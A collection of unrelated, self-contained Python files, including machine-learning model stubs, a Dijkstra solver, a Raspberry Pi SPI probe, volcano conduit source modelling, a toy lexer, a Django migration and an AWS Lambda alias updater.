# self.fc2=torch.nn.Linear(unitN,unitN)
# self.l=torch.nn.Linear(unitN,taskcla[0][1])
# if notMNIST:
# self.fc3=torch.nn.Linear(unitN,unitN)
# self.fc4=torch.nn.Linear(unitN,unitN)
# if split:
# self.last=torch.nn.ModuleList()
# for t,n in self.taskcla:
# self.last.append(torch.nn.Linear(unitN,n))
# def forward(self,x):
# h=x.view(x.size(0),-1)
# h=self.drop(F.relu(self.fc1(h)))
# h=self.drop(F.relu(self.fc2(h)))
# if self.split:
# for t,i in self.taskcla:
# y = []
# y.append(self.last[t](h))
# else:
# y = self.l(h)
# y = F.log_softmax(y, dim=1)
# return y
|
import numpy as np
import pandas as pd
filename = {"data1": "GSE71858.npy", #
"data2": "GSE60361.npy", #
"data3": "GSE71585.npy",
"data4": "GSE62270.npy", #
"data5": "GSE48968.npy", #
"data6": "GSE52529.npy", #
"data7": "GSE77564.npy",
"data8": "GSE78779.npy", #
"data9": "GSE10247.npy", #
"data10": "GSE69405.npy"}
#for _, f_name in filename.items():
# if f_name[-3:] == "txt":
# _file = pd.read_table(f_name, sep='\s+', index_col=False)
# else:
# _file = pd.read_csv(f_name, index_col=False)
# _file_t = np.array(_file)
# _file_t = np.delete(_file_t, 0, 1)
# file_t = np.around(_file_t.astype(np.float), decimals=7)
# np.savetxt(f_name[0:8] + '.txt', _file_t)
#np.save(f_name[0:8] + ".npy", _file_t)
#print np.loadtxt(f_name[0:7] + '.txt').shape
for f_key, f_name in filename.items():
data = np.load("./Data/"+f_name)
print f_key, data.shape
|
import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np
import functools
def new_weights(shape):
return tf.Variable(tf.truncated_normal(shape, stddev=0.05))
def new_biases(length):
return tf.Variable(tf.constant(0.05, shape=[length]))
def new_conv_layer(input, num_input_channels, filter_size, num_filters, use_pooling=False):
shape = [filter_size, filter_size, num_input_channels, num_filters]
weights = new_weights(shape=shape)
biases = new_biases(length=num_filters)
layer = tf.nn.conv2d(input=input,
filter=weights,
strides=[1, 1, 1, 1],
padding='SAME')
layer += biases
if use_pooling:
layer = tf.nn.max_pool(value=layer,
ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1],
padding='SAME')
layer = tf.nn.relu(layer)
return layer, weights
class CNNSRModel:
def __init__(self, x, y):
self.x = x
self.y = y
def _placeholder(self):
pass
def kernel(self):
layer_conv1, weights_conv1 = new_conv_layer(input=x_ph, num_input_channels=3, filter_size=5, num_filters=64)
layer_conv2, weights_conv2 = new_conv_layer(input=layer_conv1, num_input_channels=64, filter_size=1,
num_filters=16)
layer_conv3, weights_conv3 = new_conv_layer(input=layer_conv2, num_input_channels=16, filter_size=5,
num_filters=3)
return [layer_conv1, layer_conv2, layer_conv3], [weights_conv1, weights_conv1, weights_conv1]
|
from time import ctime
from torbjorn.version import VERSION
def run():
cur_time = ctime()
text = f"""
# Torbjorn
Version {VERSION} ({cur_time} +0800)
"""
print(text)
|
def dijkstra(vertices, arestas, inicial, final):
visitados = set()
parente = dict()
nao_visitados = set({inicial})
distancias = {inicial:0}
while len(nao_visitados) > 0:
atual = min([(distancias[no],no) for no in nao_visitados])[1]
if atual == final: # já achou o menor caminho até o final
break
visitados.add(atual)
nao_visitados.remove(atual)
atual_arestas = arestas[atual]
vizinhos = []
for x in range(len(atual_arestas)):
if not atual_arestas[x][0] in visitados:
vizinhos.append(atual_arestas[x])
for vizinho in vizinhos:
distancia = distancias[atual] + vizinho[1]
if distancia < distancias.get(vizinho[0], float('inf')):
distancias[vizinho[0]] = distancia
parente[vizinho[0]] = atual
nao_visitados.add(vizinho[0])
return distancias[final]
def main():
entrada = input()
(qtd_vertices,qtd_arestas) = map(int,entrada.split())
vertices = list(range(qtd_vertices))
arestas = {}
for i in range(qtd_arestas):
entrada = input()
(origem,destino,peso) = map(int, entrada.split())
if origem in arestas:
arestas[origem].append((destino,peso))
else:
arestas[origem] = [(destino,peso)]
resultado = dijkstra(vertices,arestas,0,len(vertices)-1)
print(resultado)
if __name__ == '__main__':
main()
|
# Copyright (c) Xavier Figueroa
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import yaml
from spdx.parsers import jsonyamlxml
class Parser(jsonyamlxml.Parser):
"""
Wrapper class for jsonyamlxml.Parser to provide an interface similar to
RDF and TV Parser classes (i.e., spdx.parsers.<format name>.Parser) for YAML parser.
It also avoids to repeat jsonyamlxml.Parser.parse code for JSON, YAML and XML parsers
"""
def __init__(self, builder, logger):
super(Parser, self).__init__(builder, logger)
def parse(self, file):
self.document_object = yaml.safe_load(file).get("Document")
return super(Parser, self).parse()
|
# -*- coding: utf-8 -*-
import sys
import os
import datetime
import time
import codecs
import ctypes
import array
WM_CHAR = 0x0102
def enum_child_windows_proc(handle, list):
list.append(handle)
return 1
qLogNow=datetime.datetime.now()
qLogFlie = 'temp/_log/' + qLogNow.strftime('%Y%m%d-%H%M%S') + '_' + os.path.basename(__file__) + '.log'
def qLogOutput(pLogText='', pDisplay=False, pOutfile=True):
#try:
if (pDisplay == True):
print(str(pLogText))
if (pOutfile == True):
w = codecs.open(qLogFlie, 'a', 'utf-8')
w.write(str(pLogText) + '\n')
w.close()
w = None
#except:
#pass
if __name__ == "__main__":
qLogOutput('___main___:init')
qLogOutput('___main___:exsample.py txtFile, winTitle ')
txtFile = '_speech_a3_sendmessage.py'
winTitle = u'無題 - メモ帳'
if (len(sys.argv) >= 2):
txtFile = sys.argv[1]
if (len(sys.argv) >= 3):
winTitle = sys.argv[2]
qLogOutput('')
qLogOutput('___main___:txtFile =' + str(txtFile ))
qLogOutput('___main___:winTitle =' + str(winTitle ))
parent_handle = ctypes.windll.user32.FindWindowW(0, winTitle)
if (parent_handle == 0):
#qLogOutput('winTitle "' + winTitle + '" is not found !', True)
qLogOutput('winTitle "' + winTitle + '" is not found !')
else:
child_handles = array.array('i')
ENUM_CHILD_WINDOWS = ctypes.WINFUNCTYPE( \
ctypes.c_int, \
ctypes.c_int, \
ctypes.py_object)
ctypes.windll.user32.EnumChildWindows( \
parent_handle, \
ENUM_CHILD_WINDOWS(enum_child_windows_proc), \
ctypes.py_object(child_handles) )
try:
rt = codecs.open(txtFile, 'r', 'utf-8')
for txt in rt:
txt = txt.replace('\r', '')
txt = txt.replace('\n', '')
txt += '\n'
for i in range(len(txt)):
ctypes.windll.user32.SendMessageW(child_handles[0], WM_CHAR, (ord(txt[i])), 0)
rt.close
rt = None
except:
rt = None
qLogOutput('___main___:terminate')
qLogOutput('___main___:bye!')
|
code = '''UDRLRRRUULUUDULRULUDRDRURLLDUUDURLUUUDRRRLUUDRUUDDDRRRLRURLLLDDDRDDRUDDULUULDDUDRUUUDLRLLRLDUDUUUUDLDULLLDRLRLRULDDDDDLULURUDURDDLLRDLUDRRULDURDDLUDLLRRUDRUDDDLLURULRDDDRDRRLLUUDDLLLLRLRUULRDRURRRLLLLDULDDLRRRRUDRDULLLDDRRRDLRLRRRLDRULDUDDLDLUULRDDULRDRURRURLDULRUUDUUURDRLDDDURLDURLDUDURRLLLLRDDLDRUURURRRRDRRDLUULLURRDLLLDLDUUUDRDRULULRULUUDDULDUURRLRLRRDULDULDRUUDLLUDLLLLUDDULDLLDLLURLLLRUDRDLRUDLULDLLLUDRLRLUDLDRDURDDULDURLLRRRDUUDLRDDRUUDLUURLDRRRRRLDDUUDRURUDLLLRRULLRLDRUURRRRRLRLLUDDRLUDRRDUDUUUDRUDULRRULRDRRRDDRLUUUDRLLURURRLLDUDRUURDLRURLLRDUDUUDLLLUULLRULRLDLRDDDU
DRRRDRUDRLDUUDLLLRLULLLUURLLRLDRLURDRDRDRLDUUULDRDDLDDDURURUDRUUURDRDURLRLUDRRRDURDRRRDULLRDRRLUUUURLRUULRRDUDDDDUURLDULUDLLLRULUDUURRDUULRRDDURLURRUDRDRLDLRLLULULURLRDLRRRUUURDDUUURDRDRUURUDLULDRDDULLLLLRLRLLUDDLULLUDDLRLRDLDULURDUDULRDDRLUDUUDUDRLLDRRLLDULLRLDURUDRLRRRDULUUUULRRLUDDDLDUUDULLUUURDRLLULRLDLLUUDLLUULUULUDLRRDDRLUUULDDRULDRLURUURDLURDDRULLLLDUDULUDURRDRLDDRRLRURLLRLLLLDURDLUULDLDDLULLLRDRRRDLLLUUDDDLDRRLUUUUUULDRULLLDUDLDLURLDUDULRRRULDLRRDRUUUUUURRDRUURLDDURDUURURULULLURLLLLUURDUDRRLRRLRLRRRRRULLDLLLRURRDULLDLLULLRDUULDUDUDULDURLRDLDRUUURLLDLLUUDURURUD
UDUUUUURUDLLLRRRDRDRUDDRLLDRRLDRLLUURRULUULULRLLRUDDRLDRLUURDUDLURUULLLULLRRRULRLURRDDULLULULRUDDDUURDRLUDUURRRRUUULLRULLLDLURUDLDDLLRRRULDLLUURDRRRDRDURURLRUDLDLURDDRLLLUUDRUULLDLLLLUUDRRURLDDUDULUDLDURDLURUURDUUUURDLLLRUUURDUUUDLDUDDLUDDUDUDUDLDUDUUULDULUURDDLRRRULLUDRRDLUDULDURUURULLLLUDDDLURURLRLRDLRULRLULURRLLRDUDUDRULLRULRUDLURUDLLDUDLRDRLRDURURRULLDDLRLDDRLRDRRDLRDDLLLLDUURRULLRLLDDLDLURLRLLDULRURRRRDULRLRURURRULULDUURRDLURRDDLDLLLRULRLLURLRLLDDLRUDDDULDLDLRLURRULRRLULUDLDUDUDDLLUURDDDLULURRULDRRDDDUUURLLDRDURUDRUDLLDRUD
ULRDULURRDDLULLDDLDDDRLDUURDLLDRRRDLLURDRUDDLDURUDRULRULRULULUULLLLDRLRLDRLLLLLRLRRLRLRRRDDULRRLUDLURLLRLLURDDRRDRUUUDLDLDRRRUDLRUDDRURRDUUUDUUULRLDDRDRDRULRLLDLDDLLRLUDLLLLUURLDLRUDRLRDRDRLRULRDDURRLRUDLRLRLDRUDURLRDLDULLUUULDRLRDDRDUDLLRUDDUDURRRRDLDURRUURDUULLDLRDUDDLUDDDRRRULRLULDRLDDRUURURLRRRURDURDRULLUUDURUDRDRLDLURDDDUDDURUDLRULULURRUULDRLDULRRRRDUULLRRRRLUDLRDDRLRUDLURRRDRDRLLLULLUULRDULRDLDUURRDULLRULRLRRURDDLDLLRUUDLRLDLRUUDLDDLLULDLUURRRLRDULRLRLDRLDUDURRRLLRUUDLUURRDLDDULDLULUUUUDRRULLLLLLUULDRULDLRUDDDRDRDDURUURLURRDLDDRUURULLULUUUDDLRDULDDLULDUDRU
LRLRLRLLLRRLUULDDUUUURDULLLRURLDLDRURRRUUDDDULURDRRDURLRLUDLLULDRULLRRRDUUDDRDRULLDDULLLUURDLRLRUURRRLRDLDUDLLRLLURLRLLLDDDULUDUDRDLRRLUDDLRDDURRDRDUUULLUURURLRRDUURLRDLLUDURLRDRLURUURDRLULLUUUURRDDULDDDRULURUULLUDDDDLRURDLLDRURDUDRRLRLDLRRDDRRDDRUDRDLUDDDLUDLUDLRUDDUDRUDLLRURDLRUULRUURULUURLRDULDLDLLRDRDUDDDULRLDDDRDUDDRRRLRRLLRRRUUURRLDLLDRRDLULUUURUDLULDULLLDLULRLRDLDDDDDDDLRDRDUDLDLRLUDRRDRRDRUURDUDLDDLUDDDDDDRUURURUURLURLDULUDDLDDLRUUUULRDRLUDLDDLLLRLLDRRULULRLRDURRRLDDRDDRLU'''.split("\n")
#keypad like
# 1 2 3
# 4 5 6
# 7 8 9
keypad = {
1: {"U": None, "D": 4, "L": None, "R": 2},
2: {"U": None, "D": 5, "L": 1, "R": 3},
3: {"U": None, "D": 6, "L": 2, "R": None},
4: {"U": 1, "D": 7, "L": None, "R": 5},
5: {"U": 2, "D": 8, "L": 4, "R": 6},
6: {"U": 3, "D": 9, "L": 5, "R": None},
7: {"U": 4, "D": None, "L": None, "R": 8},
8: {"U": 5, "D": None, "L": 7, "R": 9},
9: {"U": 6, "D": None, "L": 8, "R": None}
}
current = 5
secret_input = ""
for line in code:
for move in line:
if keypad[current][move]:
current = keypad[current][move]
secret_input += str(current)
print("Secret keypad code: ", secret_input)
|
import ovl
target_filters = [ovl.percent_area_filter(min_area=0.005),
ovl.circle_filter(min_area_ratio=0.7),
ovl.area_sort()]
threshold = YELLOW_HSV = ovl.Color([20, 100, 100], [55, 255, 255])
yellow_circle = ovl.Vision(threshold=threshold,
target_filters=target_filters,
camera=0, # open the first connected camera
image_filters=[ovl.gaussian_blur()])
while True:
image = yellow_circle.get_image()
targets, filtered_image = yellow_circle.detect(image)
directions = yellow_circle.get_directions(targets, filtered_image)
print(directions) # prints out the (x, y) coordinates of the largest target
|
# C1C Matt Grimm
# Nov 15
# USAFA
import threading
from threading import Thread
import RPi.GPIO as GPIO
import spidev
import time
# This is my attempt at trying to analyze multiple signals at once on the same
# Raspberry Pi Board. It's a low resource "logic analyzer", or I'd like to think so.
def xmit():
for x in range(100):
xfer_read.append(spi.xfer([0x07]))
print(spi.xfer([0x07]))
# I believe the resultant from this print is something about the
# MISO + MOSI readings combining (look at component sheet to see how it's
# a little strange, which is why I would like to try to use a logic analyzer
# to know exactly what I am getting)
print("working\n")
# See results matched.
for q in range(100):
print(xfer_read[q],end ="")
def csn():
for y in range(100):
gpio_read.append(GPIO.input(8))
print(GPIO.input(8)) # Maybe messes with SPI layout; putting GPIO on top of SPI?
print("WORKING\n")
# See results. To mix up formatting of display, use time.sleep's and add/omit end='' at the end of print function.
time.sleep(1.25)
print("\n")
for z in range(100):
#print(gpio_read[z], end = "")
print(gpio_read[z], end = "")
if __name__ == '__main__': # !!This helps with using threads if I declare a "main" to run.
gpio_read =[]
xfer_read=[]
GPIO.setmode(GPIO.BCM)
GPIO.setup(8,GPIO.IN) # SPI0 CE0 (I think this fluctuates depending on input which is why I am trying to test it.)
spi = spidev.SpiDev()
spi.open(0,0)
spi.max_speed_hz = 7629
# a = Thread(target=func1).start()
# b = Thread(target=func2).start()
# Pretty sure threads here run concurrently. Processes probably run simultaneously.
# Could use semaphores to disallow threads to use same resources at same time.
# I think they still do internal calculating while waiting though...would have to
# experiment/check.
a = threading.Thread(target=func1)
b = threading.Thread(target=func2)
a.start()
b.start()
a.close()
b.close()
# Make lists global somehow to better format results through grouping??
print("Closed")
# 0 1 0 0 1 0 1 0 0 1 0 1 0 0 1 0 1 0 0 1 0 1 0 0
# SYNCED (What do these numbers mean??)
#[0][14][12][0][14][0][8][14][0][14][0][8][14][0][14][0][8]
# MORE RESULTS WHEN RUNNING THE PROGRAM!!
#[#] numbers are from printing the spi transfer. My previous experience has
# told me this shows what is going through MISO.
# Looking at nRF24L01 wireless transmitter datasheet, GPIO.input(intended CSN) should be low at all times.
# May look into switching this functionality over to a GPIO instead of SPI Chip Enable.
# Just to note my wiring setup, I am connecting one wireless transmitter nRF24L01
# using an SPI layout. SPI0 MOSI/MISO and SPI0 CE0 for CSN and BCM23 for CE. 3.3V for VCC.
# Honestly, you could probably switch the GPIO pin number to whatever necessary in testing.
# Was trying to send a read signal to MOSI to get a status register response from MISO.
# See https://www.sparkfun.com/datasheets/Components/SMD/nRF24L01Pluss_Preliminary_Product_Specification_v1_0.pdf
# Pg 56 and 49
# --== OUTPUT EXAMPLE ==--
# [0][0][0][0][14][0][14][0][14][0][0][12][0][14][0][14][0][12][8][0][14]
#[0][14][0][8][12][0][14][0][14][0][14][0][8][12][0][14][0][14][0][0][14]
#[0][14][0][0][14][0][14][0][0][14][0][14][0][0][14][0][14][0][14][8][0]
#[14][0][8][14][0][14][0][0][14][0][14][0][0][14][0][14][0][0][14][0][14]
#[0][0][14][0][14][0][14][0][14][0][14][0][14][0][0][0]
# 1010101001010100101010010101010010101001010010100101001010110101101001010010
# 100101001010010101101000
|
#!/usr/bin/env python
# coding: utf-8
# Sets up the source description (both single force and moment) from results of conduit flow model
# In[2]:
import numpy as np
import gc
# In[ ]:
def time_height(time, dt, height, cushion=4000):
'''
takes the time and height arrays from conduit flow simulation and
puts in form for calculations to fit
NB: - cushion is adding time points prior to simulation start (to eliminate some
edge effects from fourier transform)
- relabelling positions along conduit so that z=0 is the top
'''
NN = len(time)
t = np.arange(-cushion, NN) * dt
t[cushion:] = time
z = -(height - max(height)*np.ones(len(height)))
return t, z
# In[3]:
def equivforce_per_unitvolume(time, density_vel):
'''
returns the equivalent single force per unit volume acting on surrounding earth
(positive -> upwards)
(based off of methods in Sec 4, Takei & Kumazawa 1993)
density_vel : (# grid points, # time points)
df_dV : (# grid points, # time points)
'''
dim = density_vel.shape
df_dV = np.zeros(dim, dtype='float')
# d(rho * v)/dt
df_dV += - np.gradient(density_vel, time, axis=1)
return df_dV
# In[ ]:
def singleforce_density(density_vel, time, area, cushion=4000):
'''
returns dforce/dz time series for each point along conduit with added
cushion at the beginning, given rho_v time series for each point
NB: returns the change in dforce/dz from the initial value (looking at deviations
from original equilibrium state)
(positive -> upwards : ACTING ON SURROUNDING EARTH)
density_vel : (# grid points, # OG time points) : rho*v time series at each grid point
time : (# OG time points + cushion) : cushioned time points
area : (1) : conduit cross-sectional area
cushion : (1) : # time points of constant cushion
'''
HH = np.ma.size(density_vel, axis=0)
NN_og = np.ma.size(density_vel, axis=1)
NN = NN_og + cushion
rho_v = np.zeros((HH, NN))
ones = np.ones(cushion)
for ii in range(HH):
if cushion != 0:
rho_v[ii,:cushion] = ones * density_vel[ii,0]
rho_v[ii,cushion:] = density_vel[ii,:]
gc.collect()
dforce_dz_true = area * equivforce_per_unitvolume(time, rho_v)
dforce_dz_initial = np.tile(dforce_dz_true[:,0], (NN, 1)).transpose()
dforce_dz = dforce_dz_true - dforce_dz_initial
gc.collect()
return dforce_dz
# In[1]:
def moment_tensor_cylindricalSource(mediumParams):
'''
returns the moment tensor for a cylindrical source oriented along the z-axis
NB: defined in cartesian basis
'''
lame, mu = mediumParams
moment_tensor = ((lame + 2*mu) / mu) * np.eye(3)
moment_tensor[2,2] = lame / mu
return moment_tensor
# In[2]:
def moment_density(pressure, area, cushion=4000):
'''
returns dmoment/dz time series for each point along conduit with added
cushion at the beginning, given pressure time series for each point
NB: returns the change in dmoment/dz from the initial value (looking at deviations
from original equilibrium state)
pressure : (# grid points, # OG time points) : pressure time series at each grid point
area : (1) : conduit cross-sectional area
cushion : (1) : # time points of constant cushion
'''
HH = np.ma.size(pressure, axis=0)
NN_og = np.ma.size(pressure, axis=1)
NN = NN_og + cushion
dp_cushion = np.zeros((HH, NN))
for ii in range(HH):
dp_cushion[ii, cushion:] = pressure[ii,:] - pressure[ii,0] * np.ones(NN_og)
gc.collect()
dmoment_dz = area * dp_cushion
return dmoment_dz
def cushioned_general_MT(moment_tensor, cushion=4000):
'''
returns general moment tensor time series with added cushion at the beginning
NB: - returns the change in moment_tensor from the initial value (looking at
deviations from original equilibrium state)
- single MT (i.e. no extended source consideration)
moment_tensor : (3, 3, # OG time points) : time series for a general moment tensor
cushion : (1) : # time points of constant cushion
'''
NN_og = np.ma.size(moment_tensor, axis=2)
NN = NN_og + cushion
dMT_cushion = np.zeros((3, 3, NN))
dMT_cushion[:,:,cushion:] = moment_tensor[:,:,:] - np.tile(moment_tensor[:,:,0:1], [1, 1, NN_og])
gc.collect()
return dMT_cushion
|
import unittest
from multiplicable_numbers import displays_detected_numbers
class TestDisplaysDetectedNumbers(unittest.TestCase):
def setUp(self):
self.one_to_a_hundred_with_three_and_five_multiplicables = [
'1', '2', 'Three', '4', 'Five', 'Three', '7', '8', 'Three', 'Five', '11', 'Three', '13', '14', 'ThreeFive',
'16', '17', 'Three', '19', 'Five', 'Three', '22', '23', 'Three', 'Five', '26', 'Three', '28', '29',
'ThreeFive', '31', '32', 'Three', '34', 'Five', 'Three', '37', '38', 'Three', 'Five', '41', 'Three', '43',
'44', 'ThreeFive', '46', '47', 'Three', '49', 'Five', 'Three', '52', '53', 'Three', 'Five', '56', 'Three',
'58', '59', 'ThreeFive', '61', '62', 'Three', '64', 'Five', 'Three', '67', '68', 'Three', 'Five', '71',
'Three', '73', '74', 'ThreeFive', '76', '77', 'Three', '79', 'Five', 'Three', '82', '83', 'Three', 'Five',
'86', 'Three', '88', '89', 'ThreeFive', '91', '92', 'Three', '94', 'Five', 'Three', '97', '98', 'Three',
'Five']
self.one_to_a_hundred_with_tow_and_four_multiplicables = [
'1', 'Two', '3', 'TwoFour', '5', 'Two', '7', 'TwoFour', '9', 'Two', '11', 'TwoFour', '13', 'Two', '15',
'TwoFour', '17', 'Two', '19', 'TwoFour', '21', 'Two', '23', 'TwoFour', '25', 'Two', '27', 'TwoFour', '29',
'Two', '31', 'TwoFour', '33', 'Two', '35', 'TwoFour', '37', 'Two', '39', 'TwoFour', '41', 'Two', '43',
'TwoFour', '45', 'Two', '47', 'TwoFour', '49', 'Two', '51', 'TwoFour', '53', 'Two', '55', 'TwoFour', '57',
'Two', '59', 'TwoFour', '61', 'Two', '63', 'TwoFour', '65', 'Two', '67', 'TwoFour', '69', 'Two', '71',
'TwoFour', '73', 'Two', '75', 'TwoFour', '77', 'Two', '79', 'TwoFour', '81', 'Two', '83', 'TwoFour', '85',
'Two', '87', 'TwoFour', '89', 'Two', '91', 'TwoFour', '93', 'Two', '95', 'TwoFour', '97', 'Two', '99',
'TwoFour']
self.one_to_a_hundred_with_six_and_nine_multiplicables = [
'1', '2', '3', '4', '5', 'Six', '7', '8', 'Nine', '10', '11', 'Six', '13', '14', '15', '16', '17',
'SixNine', '19', '20', '21', '22', '23', 'Six', '25', '26', 'Nine', '28', '29', 'Six', '31', '32', '33',
'34', '35', 'SixNine', '37', '38', '39', '40', '41', 'Six', '43', '44', 'Nine', '46', '47', 'Six', '49',
'50', '51', '52', '53', 'SixNine', '55', '56', '57', '58', '59', 'Six', '61', '62', 'Nine', '64', '65',
'Six', '67', '68', '69', '70', '71', 'SixNine', '73', '74', '75', '76', '77', 'Six', '79', '80', 'Nine',
'82', '83', 'Six', '85', '86', '87', '88', '89', 'SixNine', '91', '92', '93', '94', '95', 'Six', '97', '98',
'Nine', '100']
def test_one_to_a_hundred_with_three_and_five_multiplicables(self):
results = displays_detected_numbers(1, 100, [3, 5])
self.assertEqual(results, self.one_to_a_hundred_with_three_and_five_multiplicables)
def test_one_to_a_hundred_with_tow_and_four_multiplicables(self):
results = displays_detected_numbers(1, 100, [2, 4])
self.assertEqual(results, self.one_to_a_hundred_with_tow_and_four_multiplicables)
def test_one_to_a_hundred_with_six_and_nine_multiplicables(self):
results = displays_detected_numbers(1, 100, [6, 9])
self.assertEqual(results, self.one_to_a_hundred_with_six_and_nine_multiplicables)
|
"""Reflexec config validator module.
"""
import logging
import shlex
from distutils.util import strtobool
log = logging.getLogger("reflexec")
def validate_config_value(key, cfg):
"""Validate config value."""
if key not in cfg:
return
validator_fn = globals()[f"validate_{key}"]
value = cfg[key]
try:
value = validator_fn(value)
except ValueError as err:
del cfg[key]
raise ValueError(f"Invalid value {value!r} for parameter {key!r}: {err}")
if value is None:
del cfg[key]
else:
cfg[key] = value
def validate_debug(value):
"""Validate "debug" parameter."""
if isinstance(value, str):
value = strtobool(value)
return bool(value)
def validate_command(value):
"""Validate "command" parameter."""
if isinstance(value, str):
value = shlex.split(value)
return list(value)
def validate_name(value):
"""Validate "name" parameter."""
assert isinstance(value, str)
return value
def validate_delay(value):
"""Validate "delay" parameter."""
try:
value = float(value)
if int(value) == value:
value = int(value)
except ValueError:
raise ValueError("Must be float")
if value < 0:
raise ValueError("Negative value is not allowed")
return value
def validate_output(value):
"""Validate "output" parameter."""
if value is not None:
if isinstance(value, str):
value = value.split(",")
# filter out empty names
value = list(filter(None, value))
return value
def validate_start(value):
"""Validate "start" parameter."""
if value not in ("watch", "exec"):
raise ValueError('Must be "exec" or "watch"')
return value
def validate_watcher(value):
"""Validate "watcher" parameter."""
assert isinstance(value, str)
return value
def validate_type(value):
"""Validate "type" parameter."""
if value not in ("default", "command"):
raise ValueError('Must be "default" or "command"')
return value
def validate_watch(value):
"""Validate "watch" parameter."""
if not value:
return None
if isinstance(value, str):
value = [_ for _ in value.split("\n") if _]
return value
def validate_max_execs(value):
"""Validate "max_execs" parameter."""
try:
value = int(value)
except ValueError:
raise ValueError("Must be integer")
if value < 0:
raise ValueError("Negative value is not allowed")
return value
|
# Generated by Django 2.2.2 on 2019-06-13 18:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('library', '0002_auto_20190613_1747'),
]
operations = [
migrations.RemoveField(
model_name='author',
name='slug',
),
migrations.RemoveField(
model_name='book',
name='slug',
),
migrations.AddField(
model_name='book',
name='vote_count',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='book',
name='vote_sum',
field=models.IntegerField(default=0),
),
]
|
# encoding: utf-8
"""Utilities for working with data structures like lists, dicts and tuples.
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2008-2011 The yap_ipython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
def uniq_stable(elems):
"""uniq_stable(elems) -> list
Return from an iterable, a list of all the unique elements in the input,
but maintaining the order in which they first appear.
Note: All elements in the input must be hashable for this routine
to work, as it internally uses a set for efficiency reasons.
"""
seen = set()
return [x for x in elems if x not in seen and not seen.add(x)]
def flatten(seq):
"""Flatten a list of lists (NOT recursive, only works for 2d lists)."""
return [x for subseq in seq for x in subseq]
def chop(seq, size):
"""Chop a sequence into chunks of the given size."""
return [seq[i:i+size] for i in range(0,len(seq),size)]
|
import re
from composite import composite_function
from typing import *
from error import error
A = NewType('A', int)
class Token:
def __init__(self, type_: str, text_: str):
self.type = type_
self.text = text_
def __repr__(self):
return "[" + self.type + ", " + self.text + "]"
# genToken :: str -> Token
def genToken(w: str) -> Token:
"""
Gets token out of word
"""
builtins = ["zeg_na", "stel", "stapel", "verklein", "definieer", "produceer", "verdeel"]
if w in builtins:
return Token("BuiltIn", w)
if w[0] == '"' and w[-1] == '"':
return Token("String", w)
if w.isnumeric():
return Token("Number", int(w))
if re.fullmatch("^[a-zA-Z_][a-zA-Z_0-9]*", w) is not None:
return Token("Identifier", w)
if w == "lus":
return Token("LoopStart", w)
if w == "sul":
return Token("LoopEnd", w)
if w == "indien":
return Token("If", w)
if w == "neidni":
return Token("Endif", w)
error("Invalid Syntax: %s" % w)
# ifNotDecorator :: (A -> A) -> (str, str)
def ifNotDecorator(func: Callable[[A], A]) -> Tuple[str, str]:
'''Decorator that checks input is not empty and returns a tuple of two empty strings otherwise'''
def inner(toLex):
if not toLex:
return ("","")
return func(toLex)
return inner
@ifNotDecorator
# lexString :: str -> (str, str)
def lexString(toLex: str) -> Tuple[str, str]:
'''Lex a literal string'''
head, *tail = toLex
if head != '"':
string, rest = lexString(tail)
return (head+string, rest)
else:
return (head, tail)
@ifNotDecorator
# lexToken :: str -> (str, str)
def lexToken(toLex: str) -> Tuple[str, str]:
'''Lex words to be used by genToken'''
head, *tail = toLex
if head != " ":
string, rest = lexToken(tail)
return (head+string, rest)
else:
return ("", tail)
# lexLine :: str -> ([Token | Str], str)
def lexLine(toLex: str) -> Tuple[List[Union[Token, str]], str]:
'''Lex a line of code'''
if not toLex:
return ([],"")
head, *tail = toLex
if head.isalnum():
token, rest = lexToken(toLex)
string, rest2 = lexLine(rest)
return ([token,string], rest2)
elif head == " ":
string, rest = lexLine("".join(tail))
return (string, rest)
elif head == '"':
string, rest = lexString("".join(tail))
string2, rest2 = lexLine(rest)
return ([head+string,string2], rest2)
return ([], toLex)
# Didn't know how to define this one with python typing
# But it converts from a recursive list to a regular python list
# Haskell typing makes no sense either because haskell only uses recursive lists
# flatten :: [A, [A, [A, []]]] -> [A]
def flatten(t):
'''Flatten a recursive list to a regular python list'''
if not t:
return []
if len(t) == 1:
return t[0]
return [t[0]] + flatten(t[1])
# removeComment :: str -> str
def removeComment(toLex: str) -> str:
'''Remove comments from code before lexing'''
return toLex.split("//", 1)[0]
# myStrip :: str -> str
def myStrip(toLex: str) -> str:
'''Strip whitespace'''
return toLex.strip()
# myHead :: (A, A) -> A
def myHead(a: tuple) -> A:
'''Returns the first item of a tuple'''
return a[0]
# genTokens :: [str] -> [Token]
def genTokens(a: List[str]) -> List[Token]:
'''Loop for genToken'''
return list(map(lambda x: genToken(x), a))
# emptyLineFilter :: [Token | None] -> [Token]
def emptyLineFilter(a: List[Token | None]) -> List[Token]:
'''Filters out empty lines'''
return filter(None, a)
# Composite function
# linesToTokens = genTokens . flatten . myHead . lexLine . myStrip . removeComment
# linesToTokens :: str -> [Token]
linesToTokens = composite_function(genTokens, flatten, myHead, lexLine, myStrip, removeComment)
# lex :: str -> [Token]
def lex(filename: str) -> List[Token]:
'''Lexes a file to a list of tokens to be used by a parser'''
with open(f"youriSrc/{filename}") as file:
lines = file.read().replace(";", "\n").split("\n")
return list(filter(None, map(linesToTokens, lines)))
|
import sys
from sessions import get_session
account_number = sys.argv[1]
stage = sys.argv[2]
function_name = sys.argv[3]
version = sys.argv[4]
function_arn = f'arn:aws:lambda:eu-west-2:{account_number}:function:{function_name}'
boto_session = get_session(account_number, "TDRJenkinsLambdaRole" + stage.capitalize())
client = boto_session.client("lambda")
event_mappings = client.list_event_source_mappings()['EventSourceMappings']
uuid = list(filter(lambda x: x['FunctionArn'].startswith(function_arn), event_mappings))[0]['UUID']
client.update_event_source_mapping(UUID=uuid, FunctionName=function_arn + ":" + version)
|
class DriverArgument:
def __init__(self) -> None:
self.action: str = None
self.pl_project: dict = None
self.pl_projects: list = None
self.pl_field: str = None
self.o_lim: bool = None
self.o_quit: bool = None
